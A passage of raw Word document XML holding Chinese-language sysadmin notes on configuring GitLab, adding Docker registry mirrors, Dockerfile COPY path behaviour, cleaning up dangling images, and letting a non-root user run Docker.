          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33104D4F" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#gitlab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问地址，可以写域名。如果端口不写的话默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137298C2" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>external_url 'http://192.168.124.194'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B01C6" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745FE4B7" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>gitlab_rails['gitlab_ssh_host'] = '192.168.124.194'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD62DE1" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAACBB5" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>gitlab_rails['gitlab_shell_ssh_port'] = 9922</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55B6B7" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F9420" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>让配置生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD41DA9" w14:textId="05F25D08" w:rsidR="00381D0F" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>gitlab-ctl reconfigure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8C2F0" w14:textId="431B4422" w:rsidR="00381D0F" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0811A91E" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E68C1E3" w14:textId="73E309FD" w:rsidR="00FD68ED" w:rsidRDefault="00FD68ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680317A8" w14:textId="59AF85D6" w:rsidR="00FD68ED" w:rsidRDefault="00FD68ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAE3B9C" w14:textId="77777777" w:rsidR="00FD68ED" w:rsidRDefault="00FD68ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291B0929" w14:textId="77777777" w:rsidR="00AE0CCC" w:rsidRDefault="00AE0CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA5D6BB" w14:textId="272BA737" w:rsidR="0068426E" w:rsidRDefault="0068426E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BAB64E" w14:textId="1EC94BB8" w:rsidR="0068426E" w:rsidRDefault="00AB7EC9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc159779571"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="1F0B7A05" w14:textId="172B1387" w:rsidR="0068426E" w:rsidRDefault="0068426E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A98DFB5" w14:textId="5885EEAB" w:rsidR="00AB7EC9" w:rsidRDefault="003012A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003012A1">
        <w:t>vim /etc/docker/daemon.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1AA46E" w14:textId="4B22EAC6" w:rsidR="00AB7EC9" w:rsidRDefault="00AB7EC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F660892" w14:textId="77777777" w:rsidR="003012A1" w:rsidRDefault="003012A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58639158" w14:textId="77777777" w:rsidR="003012A1" w:rsidRDefault="003012A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"registry-mirrors":["https://hub-mirror.c.163.com","https://registry.aliyuncs.com","https://registry.docker-cn.com","https://docker.mirrors.ustc.edu.cn"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15958D77" w14:textId="69D1C21E" w:rsidR="00AB7EC9" w:rsidRDefault="003012A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10E2A0" w14:textId="35D2D2EA" w:rsidR="003012A1" w:rsidRDefault="003012A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F23D16" w14:textId="03F1F6F8" w:rsidR="003012A1" w:rsidRDefault="0012216A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0012216A">
        <w:t>service docker restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CC03A" w14:textId="78D74224" w:rsidR="003012A1" w:rsidRDefault="003012A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75114D72" w14:textId="77777777" w:rsidR="003012A1" w:rsidRDefault="003012A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1E43D8" w14:textId="3AF6AE13" w:rsidR="003D4D07" w:rsidRDefault="003D4D07" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc159779572"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker run</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="5A9F2965" w14:textId="77777777" w:rsidR="003D4D07" w:rsidRDefault="003D4D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C2F515" w14:textId="77777777" w:rsidR="003D4D07" w:rsidRDefault="003D4D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18981E66" w14:textId="77777777" w:rsidR="003D4D07" w:rsidRPr="0068426E" w:rsidRDefault="003D4D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D835B85" w14:textId="77777777" w:rsidR="0068426E" w:rsidRDefault="0068426E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1476F1BA" w14:textId="62DD16A0" w:rsidR="00FD2D17" w:rsidRDefault="00FD2D17" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc159779573"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ockerfile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="56B9E931" w14:textId="15D04D10" w:rsidR="00FD2D17" w:rsidRDefault="00FD2D17" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7329125C" w14:textId="31F6BDDB" w:rsidR="00983FC1" w:rsidRDefault="00983FC1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参照本章最后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064B989" w14:textId="77777777" w:rsidR="003C3B78" w:rsidRDefault="003C3B78" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274D15CB" w14:textId="7DE273CC" w:rsidR="003C3B78" w:rsidRDefault="003C3B78" w:rsidP="003C3B78">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制目录细节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506A3D1" w14:textId="40F632FC" w:rsidR="003C3B78" w:rsidRPr="009F5388" w:rsidRDefault="009F5388" w:rsidP="009F5388">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5388">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>屁股加不加</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5388">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F5388">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5388">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>没区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1AF106" w14:textId="77777777" w:rsidR="009F5388" w:rsidRDefault="009F5388" w:rsidP="003C3B78"/>
    <w:p w14:paraId="62355C0F" w14:textId="0A2C246F" w:rsidR="003C3B78" w:rsidRDefault="003C3B78" w:rsidP="003C3B78">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下文件复制到目标目录下，不包含目录本身</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B0B2D4" w14:textId="4F783778" w:rsidR="003C3B78" w:rsidRPr="003C3B78" w:rsidRDefault="003C3B78" w:rsidP="003C3B78">
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COPY ./dist/ /usr/share/nginx/html/</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是将</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./dist/</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放入</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /html/</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身没目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533FE6C3" w14:textId="77777777" w:rsidR="003C3B78" w:rsidRDefault="003C3B78" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37014E9A" w14:textId="319DC002" w:rsidR="003C3B78" w:rsidRDefault="003C3B78" w:rsidP="003C3B78">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连带这个目录复制进入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3151B57F" w14:textId="5B30B787" w:rsidR="009F5388" w:rsidRDefault="009F5388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009F5388">
        <w:t>COPY ./dist /usr/share/nginx/html</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5388">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/dist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A359A" w14:textId="77777777" w:rsidR="009F5388" w:rsidRDefault="009F5388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204F52B9" w14:textId="7EE9B6ED" w:rsidR="009F5388" w:rsidRDefault="002623AB" w:rsidP="002623AB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D0ADD" w14:textId="1FC67BC7" w:rsidR="002623AB" w:rsidRPr="002623AB" w:rsidRDefault="002623AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002623AB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker images -a | grep "&lt;none&gt;" | awk '{print $3}' | xargs docker rmi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCDB20" w14:textId="77777777" w:rsidR="002623AB" w:rsidRDefault="002623AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214AFCEA" w14:textId="4E71042D" w:rsidR="00FD2D17" w:rsidRDefault="00FD2D17" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc159779574"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>docker-</w:t>
      </w:r>
      <w:r>
        <w:t>compose.yaml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="44FA0F52" w14:textId="0D098B40" w:rsidR="00FD2D17" w:rsidRDefault="00FD2D17" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422FD87D" w14:textId="01B8EA86" w:rsidR="00136885" w:rsidRDefault="00136885" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中构建，则使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153DBE60" w14:textId="7CBD342D" w:rsidR="00136885" w:rsidRDefault="00136885" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0187913F" w14:textId="77777777" w:rsidR="00136885" w:rsidRDefault="00136885" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22662CBE" w14:textId="77777777" w:rsidR="00FD2D17" w:rsidRDefault="00FD2D17" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23831C2E" w14:textId="7AD32950" w:rsidR="007772FA" w:rsidRDefault="007772FA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc159779575"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决只能有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，普通用户无法操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dockers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="70C01929" w14:textId="398D843B" w:rsidR="007772FA" w:rsidRDefault="007772FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051695D7" w14:textId="387B3DEA" w:rsidR="007772FA" w:rsidRDefault="007772FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46744" w:rsidRPr="00B46744">
        <w:t>https://www.cnblogs.com/-mrl/p/13836631.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC99621" w14:textId="410C01BA" w:rsidR="007772FA" w:rsidRDefault="007772FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AB245A" w14:textId="7117C1D1" w:rsidR="002126FD" w:rsidRDefault="002126FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002126FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>看当前系统中的用户和组：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CD43CB" w14:textId="4F77C6A2" w:rsidR="002126FD" w:rsidRDefault="002126FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、用户列表文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB866D" w14:textId="1DAEA189" w:rsidR="007772FA" w:rsidRDefault="002126FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、用户组列表文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat /etc/group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AF4BEA" w14:textId="50000D26" w:rsidR="007772FA" w:rsidRDefault="007772FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7174B27A" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EFE14B" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vagrant@ubuntu18:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2713">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo groupadd docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2AE2C" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>groupadd: group ‘docker‘ already exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7900A31A" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将当前用户加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E0379" w14:textId="77777777" w:rsidR="007C2713" w:rsidRDefault="007C2713" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vagrant@ubuntu18:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2713">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo gpasswd -a ${USER} docker</w:t>
      </w:r>
    </w:p>
